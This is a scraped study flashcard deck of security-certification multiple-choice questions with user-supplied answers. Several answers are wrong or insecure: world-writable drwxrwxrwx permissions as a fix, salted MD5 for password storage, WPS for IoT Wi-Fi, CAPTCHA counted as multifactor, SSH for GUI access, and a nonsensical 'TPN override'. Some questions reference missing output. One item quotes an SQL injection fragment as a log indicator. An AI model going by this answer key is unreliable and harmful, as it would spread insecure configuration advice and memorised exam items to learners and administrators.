3
4
5
Perfectly
94
Q

Which of the following is an asymmetric function that generates a new and separate key every time it runs?

RSA
DSA
DHE
HMAC
PBKDF2
A

DHE (Ephemeral Diffie-Hellman)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
95
Q

Which of the following authentication concepts is a gait analysis MOST closely associated?

Somewhere you are
Something you are
Something you do
Something you know

A

Something you do

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
96
Q

Which of the following solutions should an administrator use to reduce the risk from an unknown vulnerability in a third-party software application?

Sandboxing
Encryption
Code signing
Fuzzing

A

Sandboxing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
97
Q

A systems administrator has isolated an infected system from the network and terminated the malicious
process from executing. Which of the following should the administrator do NEXT according to the incident
response process?

Restore lost data from a backup.
Wipe the system.
Document the lessons learned.
Determine the scope of impact.

A

Restore lost data from a backup

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
98
Q

A systems administrator needs to integrate multiple IoT and small embedded devices into the company’s
wireless network securely. Which of the following should the administrator implement to ensure low-power and legacy devices can connect to the wireless network?

WPS
WPA
EAP-FAST
802.1X

A

WPS (wifi protected setup)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
99
Q

Which of the following BEST describes the purpose of authorization?

Authorization provides logging to a resource and comes after authentication.
Authorization provides authentication to a resource and comes after identification.
Authorization provides identification to a resource and comes after authentication.
Authorization provides permissions to a resource and comes after authentication.

A

Authorization provides permissions to a resource and comes after authentication.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
100
Q

A Chief Information Officer (CIO) recently saw on the news that a significant security flaws exists with a
specific version of a technology the company uses to support many critical application. The CIO wants to
know if this reported vulnerability exists in the organization and, if so, to what extent the company could be harmed. Which of the following would BEST provide the needed information?

Penetration test
Vulnerability scan
Active reconnaissance
Patching assessment report

A

Penetration test

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
101
Q

Joe, a user, reports to the help desk that he can no longer access any documents on his PC. He states that he saw a window appear on the screen earlier, but he closed it without reading it. Upon investigation, the
technician sees high disk activity on Joe’s PC. Which of the following types of malware is MOST likely
indicated by these findings?

Keylogger
Trojan
Rootkit
Crypto-malware

A

Crypto-walmare

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
102
Q

A user typically works remotely over the holidays using a web-based VPN to access corporate resources. The
user reports getting untrusted host errors and being unable to connect. Which of the following is MOST likely the case?

The certificate has expired
The browser does not support SSL
The user’s account is locked out
The VPN software has reached the seat license maximum

A

The certificate has expired

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
103
Q

Which of the following is the BEST way for home users to mitigate vulnerabilities associated with IoT devices
on their home networks?

Power off the devices when they are not in use,
Prevent IoT devices from contacting the Internet directly.
Apply firmware and software updates upon availability.
Deploy a bastion host on the home network.

A

Apply firmware and software updates upon availability

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
104
Q

A security consultant is setting up a new electronic messaging platform and wants to ensure the platform
supports message integrity validation.
Which of the following protocols should the consultant recommend?

S/MIME
DNSSEC
RADIUS
802.11x

A

S/MIME

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
105
Q

A new Chief Information Officer (CIO) has been reviewing the badging and decides to write a policy that all employees must have their badges rekeyed at least annually. Which of the following controls BEST describes this policy?

Physical
Corrective
Technical
Administrative

A

Administrative

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
106
Q

A call center company wants to implement a domain policy primarily for its shift workers. The call center has
large groups with different user roles. Management wants to monitor group performance. Which of the
following is the BEST solution for the company to implement?

Reduced failed logon attempts
Mandatory password changes
Increased account lockout time
Time-of-day restrictions

A

Time-of-day restrictions

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
107
Q

A company has migrated to two-factor authentication for accessing the corporate network, VPN, and SSO.
Several legacy applications cannot support multifactor authentication and must continue to use usernames and passwords. Which of the following should be implemented to ensure the legacy applications are as secure as possible while ensuring functionality? (Choose two.)

Priveleged accounts
Password reuse restrictions
Password complexity requirements
Password recovery
Account disablement
A

Password complexity requirements

and

Account disablement

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
108
Q

After discovering the /etc/shadow file had been rewritten, a security administrator noticed an application insecurely creating files in / tmp.
Which of the following vulnerabilities has MOST likely been exploited?

Privilege escalation
Resource exhaustion
Memory leak
Pointer dereference

A

Priv Escalation

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
109
Q

A company offers SaaS, maintaining all customers’ credentials and authenticating locally. Many large
customers have requested the company offer some form of federation with their existing authentication
infrastructures. Which of the following would allow customers to manage authentication and authorizations from within their existing organizations?

Implement SAML so the company’s services may accept assertions from the customers’ authentication
servers.

Provide customers with a constrained interface to manage only their users’ accounts in the company’s
active directory server.

Provide a system for customers to replicate their users’ passwords from their authentication service to
the company’s.

Use SOAP calls to support authentication between the company’s product and the customers’
authentication servers.

A

Implement SAML so the company’s services may accept assertions from the customers’ authentication
servers.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
110
Q

An analyst receives an alert from the SIEM showing an IP address that does not belong to the assigned
network can be seen sending packets to the wrong gateway.
Which of the following network devices is misconfigured and which of the following should be done to remediate the issue?

Firewall; implement an ACL on the interface
Router; place the correct subnet on the interface
Switch; modify the access port to trunk port
Proxy; add the correct transparent interface

A

Router; place the correct subnet on the interface

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
111
Q

Which of the following is used to encrypt web application data?

MD5
AES
SHA
DHA

A

AES (Advanced Encryption Standard)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
112
Q

A user from the financial aid office is having trouble interacting with the finaid directory on the university’s
ERP system. The systems administrator who took the call ran a command and received the following output:
Subsequently, the systems administrator has also confirmed the user is a member of the finaid group on the ERP system.

Which of the following is the MOST likely reason for the issue?

The permissions on the finaid directory should be drwxrwxrwx.
The problem is local to the user, and the user should reboot the machine.
The files on the finaid directory have become corrupted.
The finaid directory is not formatted correctly

A

The permissions on the finaid directory should be drwxrwxrwx.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
113
Q

A technician has been asked to document which services are running on each of a collection of 200 servers.
Which of the following tools BEST meets this need while minimizing the work required?

Nmap
Nslookup
Netcat
Netstat

A

Netstat

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
114
Q

Joe, a member of the sales team, recently logged into the company servers after midnight local time to
download the daily lead form before his coworkers did. Management has asked the security team to provide a
method for detecting this type of behavior without impeding the access for sales employee as they travel
overseas.

Which of the following would be the BEST method to achieve this objective?

Configure time-of-day restrictions for the sales staff.
Install DLP software on the devices used by sales employees.
Implement a filter on the mail gateway that prevents the lead from being emailed.
Create an automated alert on the SIEM for anomalous sales team activity.

A

Create an automated alert on the SIEM for anomalous sales team activity

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
115
Q

Which of the following methods is used by internal security teams to assess the security of internally
developed applications?

Active reconnaissance
Pivoting
White box testing
Persistence

A

White box testing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
116
Q

Two users must encrypt and transmit large amounts of data between them. Which of the following should they
use to encrypt and transmit the data?

Symmetric algorithm
Hash function
Digital signature
Obfuscation

A

Symmetric algorithm

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
117
Q

Management wants to ensure any sensitive data on company-provided cell phones is isolated in a single
location that can be remotely wiped if the phone is lost. Which of the following technologies BEST meets this
need?

Geofencing
Containerization
Device encryption
Sandboxing

A

Containerization

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
118
Q

While troubleshooting a client application connecting to the network, the security administrator notices the
following error: Certificate is not valid. Which of the following is the BEST way to check if the digital
certificate is valid?

PKI
CRL
CSR
IPSec

A

CRL

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
119
Q

An organization wants to upgrade its enterprise-wide desktop computer solution. The organization currently
has 500 PCs active on the network. the Chief Information Security Officer (CISO) suggests that the
organization employ desktop imaging technology for such a large scale upgrade. Which of the following is a
security benefit of implementing an imaging solution?

it allows for faster deployment
it provides a consistent baseline
It reduces the number of vulnerabilities
It decreases the boot time

A

It provides a consistent baseline

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
120
Q

A number of employees report that parts of an ERP application are not working. The systems administrator
reviews the following information from one of the employee workstations:

Execute permission denied: financemodule.dll
Execute permission denied: generalledger.dll
Which of the following should the administrator implement to BEST resolve this issue while minimizing risk and attack exposure?

Update the application blacklist
Verify the DLL’s file integrity
Whitelist the affected libraries
Place the affected employees in the local administrator’s group

A

Whitelist the affected libraries

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
121
Q

Which of the following is a deployment concept that can be used to ensure only the required OS access is
exposed to software applications?

Staging environment
Sandboxing
Secure baseline
Trusted OS

A

Sandboxing

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
122
Q

A security analyst is attempting to identify vulnerabilities in a customer’s web application without impacting the system or its data. Which of the following BEST describes the vulnerability scanning concept performed?

Aggressive scan
Passive scan
Non-credentialed scan
Compliance scan

A

Passive Scan

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
123
Q

A forensic investigator has run into difficulty recovering usable files from a SAN drive. Which of the
following SAN features might have caused the problem?

Storage multipaths
Deduplication
iSCSI initiator encryption
Data snapshots

A

Deduplication

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
124
Q

Hacktivists are most commonly motivated by:

curiosity
notoriety
financial gain
political cause

A

political cause

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
125
Q

Which of the following can occur when a scanning tool cannot authenticate to a server and has to rely on
limited information obtained from service banners?

False positive
Passive reconnaissance
Access violation
Privilege escalation

A

False positive

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
126
Q

An organization plans to implement multifactor authentication techniques within the enterprise network architecture. Each authentication factor is expected to be a unique control. Which of the following BEST describes the proper employment of multifactor authentication?

Proximity card, fingerprint scanner, PIN
Fingerprint scanner, voice recognition, proximity card
Smart card, user PKI certificate, privileged user certificate
Voice recognition, smart card, proximity card

A

Proximity card, fingerprint scanner, PIN

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
127
Q

When considering IoT systems, which of the following represents the GREATEST ongoing risk after a
vulnerability has been discovered?

Difficult-to-update firmware
Tight integration to existing systems
IP address exhaustion
Not using industry standards

A

Tight integration to existing systems

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
128
Q

A bank is experiencing a DoS attack against an application designed to handle 500 IP-based sessions. in addition, the perimeter router can only handle 1Gbps of traffic. Which of the following should be implemented to prevent a DoS attacks in the future?

Deploy multiple web servers and implement a load balancer
Increase the capacity of the perimeter router to 10 Gbps
Install a firewall at the network to prevent all attacks
Use redundancy across all network devices and services

A

Use redundancy across all network devices and services

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
129
Q

A company is allowing a BYOD policy for its staff. Which of the following is a best practice that can decrease the risk of users jailbreaking mobile devices?

Install a corporately monitored mobile antivirus on the devices.
Prevent the installation of applications from a third-party application store.
Build a custom ROM that can prevent jailbreaking.
Require applications to be digitally signed.

A

Require applications to be digitally signed.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
130
Q

Upon entering an incorrect password, the logon screen displays a message informing the user that the
password does not match the username provided and is not the required length of 12 characters. Which of the following secure coding techniques should a security analyst address with the application developers to follow security best practices?

Input validation
Error handling
Obfuscation
Data exposure

A

Error handling

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
131
Q

Due to regulatory requirements, server in a global organization must use time synchronization. Which of the following represents the MOST secure method of time synchronization?

The server should connect to external Stratum 0 NTP servers for synchronization
The server should connect to internal Stratum 0 NTP servers for synchronization
The server should connect to external Stratum 1 NTP servers for synchronization
The server should connect to external Stratum 1 NTP servers for synchronization

A

The server should connect to internal Stratum 0 NTP servers for synchronization

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
132
Q

A company has critical systems that are hosted on an end-of-life OS. To maintain operations and mitigate
potential vulnerabilities, which of the following BEST accomplishes this objective?

Use application whitelisting.
Employ patch management.
Disable the default administrator account.
Implement full-disk encryption.

A

Use application whitelisting

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
133
Q

A systems administrator is configuring a new network switch for TACACS+ management and authentication.
Which of the following must be configured to provide authentication between the switch and the TACACS+
server?

802.1X
SSH
Shared secret
SNMPv3
CHAP
A

Shared secret

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
134
Q

A security engineer wants to add SSL to the public web server. Which of the following would be the FIRST
step to implement the SSL certificate?

Download the web certificate
Install the intermediate certificate
Generate a CSR
Encrypt the private key

A

Generate a CSR

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
135
Q

During a lessons learned meeting regarding a previous incident, the security team receives a follow-up action item with the following requirements:

Allow authentication from within the United States anytime
Allow authentication if the user is accessing email or a shared file system
Do not allow authentication if the AV program is two days out of date
Do not allow authentication if the location of the device is in two specific countries
Given the requirements, which of the following mobile deployment authentication types is being utilized?

Geofencing authentication
Two-factor authentication
Context-aware authentication
Biometric authentication

A

Context-aware authentication

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
136
Q

A procedure differs from a policy in that it:

is a high-level statement regarding the company’s position on a topic.

sets a minimum expected baseline of behavior.

provides step-by-step instructions for performing a task.

describes adverse actions when violations occur.

A

Provides step by step instructions for performing a task

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
137
Q

Which of the following is being used when a malicious actor searches various social media websites to find
information about a company’s system administrators and help desk staff?

Passive reconnaissance
Initial exploitation
Vulnerability scanning
Social engineering

A

Passive reconnaissance

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
138
Q

A security analyst is performing a manual audit of captured data from a packet analyzer. The analyst looks forbase64 encoded strings and applies the filter http.authbasic. Which of the following describes what theanalysts looking for?

Unauthorized software
Unencrypted credentials
SSL certificate issues
Authentication tokens

A

Unencrypted credentials

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
139
Q

A security administrator learns that PII, which was gathered by the organization, has been found in an open forum. As a result, several C-level executives found their identities were compromised, and they were victims of a recent whaling attack.

Which of the following would prevent these problems in the future? (Select TWO).

Implement a reverse proxy.
Implement an email DLP.
Implement a spam filter.
Implement a host-based firewall.
Implement a HIDS.
A

Implement an email DLP
and
Implement a spam filter

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
140
Q

A company has two wireless networks utilizing captive portals. Some employees report getting a trust error in
their browsers when connecting to one of the networks. Both captive portals are using the same server certificate for authentication, but the analyst notices the following differences between the two certificate details:

Certificate 1
Certificate Path:
Geotrust Global CA
*company.com
Certificate 2
Certificate Path:
*company.com
Which of the following would resolve the problem?

Use a wildcard certificate.
Use certificate chaining.
Use a trust model.
Use an extended validation certificate.

A

Use certificate chaining

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
141
Q

Company A has acquired Company B. Company A has different domains spread globally, and typically
migrates its acquisitions infrastructure under its own domain infrastructure. Company B, however, cannot be
merged into Company A’s domain infrastructure. Which of the following methods would allow the two
companies to access one another’s resources?

Attestation
Federation
Single sign-on
Kerberos

A

Federation

142
Q

An active/passive configuration has an impact on:

confidentiality
integrity
availability
non-repudiation

A

availability

143
Q

An instructor is teaching a hands-on wireless security class and needs to configure a test access point to show students an attack on a weak protocol. Which of the following configurations should the instructor implement?

WPA2
WPA
EAP
WEP

A

WEP

144
Q

A corporation is concerned that, if a mobile device is lost, any sensitive information on the device could be
accessed by third parties. Which of the following would BEST prevent this from happening?

Initiate remote wiping on lost mobile devices
Use FDE and require PINs on all mobile devices
Use geolocation to track lost devices
Require biometric logins on all mobile devices

A

Initiate remote wiping on lost mobile devices

145
Q

A security analyst is doing a vulnerability assessment on a database server. A scanning tool returns the
following information:

There have been several security breaches on the web server that accesses this database. The security team is instructed to mitigate the impact of any possible breaches. The security team is also instructed to improve the security on this database by making it less vulnerable to offline attacks. Which of the following would BEST accomplish these goals? (Choose two.)

Start using salts to generate MD5 password hashes
Generate password hashes using SHA-256
Force users to change passwords the next time they log on
Limit users to five attempted logons before they are locked out
Require the web server to only use TLS 1.2 encryption

A

Start using salts to generate MD5 password hashes

and

Force users to change passwords the next time they log on

146
Q

An organization hosts a public-facing website that contains a login page for users who are registered and
authorized to access a secure, non-public section of the site. That non-public site hosts information that
requires multifactor authentication for access. Which of the following access management approaches would
be the BEST practice for the organization?

Username/password with TOTP
Username/password with pattern matching
Username/password with a PIN
Username/password with a CAPTCHA

A

Username/password with a CAPTCHA

147
Q

A software development manager is taking over an existing software development project. The team currently suffers from poor communication due to a long delay between requirements documentation and feature delivery. This gap is resulting in an above average number of security-related bugs making it into production.

Which of the following development methodologies is the team MOST likely using now?

Agile
Waterfall
Scrum
Spiral

A

Waterfall

148
Q

An organization has air gapped a critical system.
Which of the following BEST describes the type of attacks that are prevented by this security measure?

Attacks from another local network segment
Attacks exploiting USB drives and removable media
Attacks that spy on leaked emanations or signals
Attacks that involve physical intrusion or theft

A

Attacks from another local network segment

149
Q

A security architect has convened a meeting to discuss an organization’s key management policy. The
organization has a reliable internal key management system, and some argue that it would be best to manage the cryptographic keys internally as opposed to using a solution from a third party. The company should use:

the current internal key management system.
a third-party key management system that will reduce operating costs.
risk benefits analysis results to make a determination.
a software solution including secure key escrow capabilities.

A

Risk benefits analysis results to make a determination

150
Q

An external attacker can modify the ARP cache of an internal computer. Which of the following types of
attacks is described?

Replay
Spoofing
DNS poisoning
Client-side attack

A

Spoofing

151
Q

Which of the following controls allows a security guard to perform a post-incident review?

Detective
Preventive
Corrective
Deterrent

A

Corrective

152
Q

An organization employee resigns without giving adequate notice. The following day, it is determined that the employees is still in possession of several company-owned mobile devices.
Which of the following could have reduced the risk of this occurring? (Choose two.)

Proper offboarding procedures
Acceptable use policies
Non-disclosure agreements
Exit interviews
Background checks
Separation of duties
A

Proper offboarding procedures

and

Exit interviews

153
Q

Which of the following encryption algorithms is used primarily to secure data at rest?

AES
SSL
TLS
RSA

A

AES

154
Q

A highly complex password policy has made it nearly impossible to crack account passwords. Which of the
following might a hacker still be able to perform?

Pass-the-hash attack
ARP poisoning attack
Birthday attack
Brute force attack

A

Pass-the-hash attack

155
Q

A company is performing an analysis of the corporate enterprise network with the intent of identifying what
will cause losses in revenue, referrals, and/or reputation when out of commission. Which of the following is an element of a BIA that is being addressed?

Mission-essential function
Single point of failure
backup and restoration plans
Identification of critical systems

A

Mission-essential function

156
Q

When backing up a database server to LTO tape drives, the following backup schedule is used. Backups take one hour to complete:
On Friday at 9:00 p.m., there is a RAID failure on the database server. The data must be restored from backup.

Which of the following is the number of backup tapes that will be needed to complete this operation?
1
2
3
4
6
A

3

157
Q

A company is executing a strategy to encrypt and sign all proprietary data in transit. The company recently
deployed PKI services to support this strategy.
Which of the following protocols supports the strategy and employs certificates generated by the PKI?
(Choose three.)

S/MIME
TLS
SFTP
SAML
SIP
IPSec
Kerberos
A

S/MIME

TLS

SFTP

158
Q

A bank uses a wireless network to transmit credit card purchases to a billing system.
Which of the following would be MOST appropriate to protect credit card information from being accessed by
unauthorized individuals outside of the premises?

Air gap
Infrared detection
Faraday cage
Protected distributions

A

Faraday cage

159
Q

A law office has been leasing dark fiber from a local telecommunications company to connect a remote office to company headquarters. The telecommunications company has decided to discontinue its dark fiber product and is offering an MPLS connection, which the law office feels is too expensive. Which of the following is the BEST solution for the law office?

Remote access VPN
VLAN
VPN concentrator
Site-to-site VPN

A

Site-to-site VPN

160
Q

A security auditor is performing a vulnerability scan to find out if mobile applications used in the organization
are secure. The auditor discovers that one application has been accessed remotely with no legitimate account credentials. After investigating, it seems the application has allowed some users to bypass authentication of that application. Which of the following types of malware allow such a compromise to take place? (Choose two.)

RAT
Ransomware
Worm
Trojan
Backdoor
A

RAT

and

Backdoor

161
Q

A newly purchased corporate WAP needs to be configured in the MOST secure manner possible.

INSTRUCTIONS

Please click on the below items on the network diagram and configure them accordingly:
WAP
DHCP Server
AAA Server
Wireless Controller
A

See PDF 288

162
Q

A hacker has a packet capture that contains:

Which of the following tools will the hacker use against this type of capture?

Password cracker
Vulnerability scanner
DLP scanner
Fuzzer

A

Password cracker

163
Q

A security analyst is reviewing the password policy for a service account that is used for a critical network
service. The password policy for this account is as follows:

Which of the following adjustments would be the MOST appropriate for the service account?

Disable account lockouts
Set the maximum password age to 15 days
Set the minimum password age to seven days
Increase password length to 18 characters

A

Set the maximum password age to 15 days

164
Q

A member of the human resources department received the following email message after sending an email containing benefit and tax information to a candidate:
“Your message has been quarantined for the following policy violation: external potential_PII. Please contact
the IT security administrator for further details”.
Which of the following BEST describes why this message was received?

The DLP system flagged the message.
The mail gateway prevented the message from being sent to personal email addresses.
The company firewall blocked the recipient’s IP address.
The file integrity check failed for the attached files.

A

The DLP system flagged the message

165
Q

When attempting to secure a mobile workstation, which of the following authentication technologies rely on the user’s physical characteristics? (Select TWO)

MAC address table
Retina scan
Fingerprint scan
Two-factor authentication
CAPTCHA
Password string
A

Retina Scan

and

Fingerprint scan

166
Q

A systems administrator wants to provide balance between the security of a wireless network and usability. The administrator is concerned with wireless encryption compatibility of older devices used by some employees. Which of the following would provide strong security and backward compatibility when accessing the wireless network?

Open wireless network and SSL VPN
WPA using a preshared key
WPA2 using a RADIUS back-end for 802.1x authentication
WEP with a 40-bit key

A

Open wireless network and SSL VPN

167
Q

An incident response manager has started to gather all the facts related to a SIEM alert showing multiple
systems may have been compromised.
The manager has gathered these facts:

The breach is currently indicated on six user PCs
One service account is potentially compromised
Executive management has been notified
In which of the following phases of the IRP is the manager currently working?

Recovery
Eradication
Containment
Identification

A

Identification

168
Q

A security administrator is creating a risk assessment with regard to how to harden internal communications in transit between servers.
Which of the following should the administrator recommend in the report?

Configure IPSec in transport mode.
Configure server-based PKI certificates.
Configure the GRE tunnel.
Configure a site-to-site tunnel.

A

Configure server-based PKI certificates

169
Q

An analyst is currently looking at the following output:
Which of the following security issues has been discovered based on the output?

Insider threat
License compliance violation
Unauthorized software
Misconfigured admin permissions

A

License compliance violation

170
Q

A security analyst is reviewing patches on servers. One of the servers is reporting the following error message
in the WSUS management console:

The computer has not reported status in 30 days.
Given this scenario, which of the following statements BEST represents the issue with the output above?

The computer in QUESTION NO: has not pulled the latest ACL policies for the firewall.
The computer in QUESTION NO: has not pulled the latest GPO policies from the management server.
The computer in QUESTION NO: has not pulled the latest antivirus definitions from the antivirus
program.
The computer in QUESTION NO: has not pulled the latest application software updates.

A

The computer in QUESTION NO: has not pulled the latest application software updates.

171
Q

Which of the following types of penetration test will allow the tester to have access only to password hashes prior to the penetration test?

Black box
Gray box
Credentialed
White box

A

Gray box

172
Q

A security administrator has replaced the firewall and notices a number of dropped connections. After looking at the data the security administrator sees the following information that was flagged as a possible issue:

“SELECT * FROM” and ‘1’=’1’

Which of the following can the security administrator determine from this?

An SQL injection attack is being attempted
Legitimate connections are being dropped
A network scan is being done on the system
An XSS attack is being attempted

A

An SQL injection attack is being attempted

173
Q

A security manager is creating an account management policy for a global organization with sales personnel who must access corporate network resources while traveling all over the world. Which of the following practices is the security manager MOST likely to enforce with the policy? (Select TWO)

Time-of-day restrictions
Password complexity
Location-based authentication
Group-based access control
Standard naming convention
A

Password complexity

and

Group-based access control

174
Q

Confidential emails from an organization were posted to a website without the organization’s knowledge.
Upon investigation, it was determined that the emails were obtained from an internal actor who sniffed the
emails in plain text. Which of the following protocols, if properly implemented, would have MOST likely
prevented the emails from being sniffed? (Select TWO)

Secure IMAP
DNSSEC
S/MIME
SMTPS
HTTPS
A

SMTPS

and

HTTPS

175
Q

A company needs to implement a system that only lets a visitor use the company’s network infrastructure if
the visitor acceps the AUP. Which of the following should the company use?

WiFi-protected setup
Password authentication protocol
Captive portal
RADIUS

A

Captive portal

176
Q

A buffer overflow can result in:

loss of data caused by unauthorized command execution.
privilege escalation caused by TPN override.
reduced key strength due to salt manipulation.
repeated use of one-time keys.

A

privilege escalation caused by TPN override.

177
Q

A software developer is concerned about DLL hijacking in an application being written. Which of the
following is the MOST viable mitigation measure of this type of attack?

The DLL of each application should be set individually
All calls to different DLLs should be hard-coded in the application
Access to DLLs from the Windows registry should be disabled
The affected DLLs should be renamed to avoid future hijacking

A

All calls to different DLLs should be hard-coded in the application

178
Q

A company is planning to build an internal website that allows for access to outside contracts and partners. A
majority of the content will only be to internal employees with the option to share.
Which of the following concepts is MOST appropriate?

VPN
Proxy
DMZ
Extranet

A

Extranet

179
Q

To get the most accurate results on the security posture of a system, which of the following actions should the security analyst do prior to scanning?

Log all users out of the system
Patch the scanner
Reboot the target host
Update the web plugins

A

Patch the scanner

180
Q

Which of the following are considered among the BEST indicators that a received message is a hoax? (Choose two.)

Minimal use of uppercase letters in the message
Warnings of monetary loss to the receiver
No valid digital signature from a known security organization
Claims of possible damage to computer hardware
Embedded URLs

A

No valid digital signature from a known security organization

Embedded URLS

181
Q

Ann, a security analyst, wants to implement a secure exchange of email. Which of the following is the BEST
option for Ann to implement?

PGP
HTTPS
WPA
TLS

A

PGP (pretty good privacy)

182
Q

A company’s IT staff is given the task of securely disposing of 100 server HDDs. The security team informs the IT staff that the data must not be accessible by a third party after disposal. Which of the following is the MOST time-efficient method to achieve this goal?

Use a degausser to sanitize the drives.
Remove the platters from the HDDs and shred them.
Perform a quick format of the HDD drives.
Use software to zero fill all of the hard drives.

A

Use software to zero fill all of the hard drives

183
Q

A systems administrator is implementing a remote access method for the system that will utilize GUI. Which of the following protocols would be BEST suited for this?

TLS
SSH
SFTP
SRTP

A

SSH

184
Q

A technician has installed a new AAA server, which will be used by the network team to control access to a
company’s routers and switches. The technician completes the configuration by adding the network team members to the NETWORK_TEAM group, and then adding the NETWORK_TEAM group to the appropriate ALLOW_ACCESS access list. Only members of the network team should have access to the company’s routers and switches.

Which of the following should the auditor recommend based on the above information?

Configure the ALLOW_ACCESS group logic to use AND rather than OR.
Move the NETWORK_TEAM group to the top of the ALLOW_ACCESS access list.
Disable groups nesting for the ALLOW_ACCESS group in the AAA server.
Remove the DOMAIN_USERS group from ALLOW_ACCESS group

A

Remove the DOMAIN_USERS group from ALLOW_ACCESS group.

185
Q

A security analyst monitors the syslog server and notices the following

pinging 10.25.27.31 with 65500 bytes of data
Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128
Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128
Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128
Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128
Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128
Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128

Which of the following attacks is occurring?
Memory leak
Buffer overflow
Null pointer deference
Integer overflow
A

Buffer overflow

186
Q

Which of the following strategies helps reduce risk if a rollback is needed when upgrading a critical system
platform?

Non-persistent configuration
Continuous monitoring
Firmware updates
Fault tolerance

A

Non-persistent configuration

187
Q

A security administrator is configuring a RADIUS server for wireless authentication. The configuration must
ensure client credentials are encrypted end-to-end between the client and the authenticator.
Which of the following protocols should be configured on the RADIUS server? (Choose two.)

PAP
MSCHAP
PEAP
NTLM
SAML
A

MSCHAP

and

PEAP

188
Q

Upon learning about a user who has reused the same password for the past several years, a security specialist reviews the logs. The following is an extraction of the report after the most recent password change requirement:

Which of the following security controls is the user’s behavior targeting?

Password expiration
Password history
Password complexity
Password reuse

A

Password history

189
Q

User from two organizations, each with its own PKI, need to begin working together on a joint project. Which of the following would allow the users of the separate PKIs to work together without connection errors?

Trust model
Stapling
Intermediate CA
Key escrow

A

Trust model

190
Q

Systems administrator and key support staff come together to simulate a hypothetical interruption of service.
The team updates the disaster recovery processes and documentation after meeting. Which of the following describes the team’s efforts?

Business impact analysis
Continuity of operation
Tabletop exercise
Order of restoration

A

Tabletop exercise

191
Q

A systems administrator wants to implement a wireless protocol that will allow the organization to
authenticate mobile devices prior to providing the user with a captive portal login. Which of the following
should the systems administrator configure?

L2TP with MAC filtering
EAP-TTLS
WPA2-CCMP with PSK
RADIUS federation

A

RADIUS federation

192
Q

To help prevent one job role from having sufficient access to create, modify, and approve payroll data, which of the following practices should be employed?

Least privilege
Job rotation
Background checks
Separation of duties

A

Separation of duties

193
Q

Which of the following is the main difference an XSS vulnerability and a CSRF vulnerability?

XSS needs the attacker to be authenticated to the trusted server.
XSS does not need the victim to be authenticated to the trusted server.
CSRF needs the victim to be authenticated to the trusted server.
CSRF does not need the victim to be authenticated to the trusted server.
CSRF does not need the attacker to be authenticated to the trusted server.

A

XSS does not need the victim to be authenticated to the trusted server.

CSRF needs the victim to be authenticated to the trusted server.

194
Q

A security analyst is implementing PKI-based functionality to a web application that has the following
requirements:

File contains certificate information
Certificate chains
Root authority certificates
Private key

All of these components will be part of one file and cryptographically protected with a password. Given this scenario, which of the following certificate types should the analyst implement to BEST meet these
requirements?

.pfx certificate
.cer certificate
.der certificate
.crt certificate

A

.pfx certificate

195
Q

A security technician has been given the task of preserving emails that are potentially involved in a dispute between a company and a contractor. Which of the following BEST describes this forensic concept?

Legal hold
Chain of custody
Order of volatility
Data acquisition

A

Legal hold

196
Q

Which of the following describes the maximum amount of time a mission essential function can operate
without the systems it depends on before significantly impacting the organization?

MTBF
MTTR
RTO
RPO

A

RTO (recovery time objective)

197
Q

A security technician has been receiving alerts from several servers that indicate load balancers have had a significant increase in traffic. The technician initiates a system scan. The scan results illustrate that the disk
space on several servers has reached capacity. The scan also indicates that incoming internet traffic to the
servers has increased. Which of the following is the MOST likely cause of the decreased disk space?

Misconfigured devices
Logs and events anomalies
Authentication issues
Unauthorized software

A

Unauthorized software

198
Q

A remote intruder wants to take inventory of a network so exploits can be researched. The intruder is looking
for information about software versions on the network. Which of the following techniques is the intruder using?

Banner grabbing
Port scanning
Packet sniffing
Virus scanning

A

Banner grabbing

199
Q

A penetration tester has written an application that performs a bit-by-bit XOR 0xFF operation on binaries prior to transmission over untrusted mediA. Which of the following BEST describes the action performed by this type of application?

Hashing
Key exchange
Encryption
Obfusication

A

Obfusication

200
Q

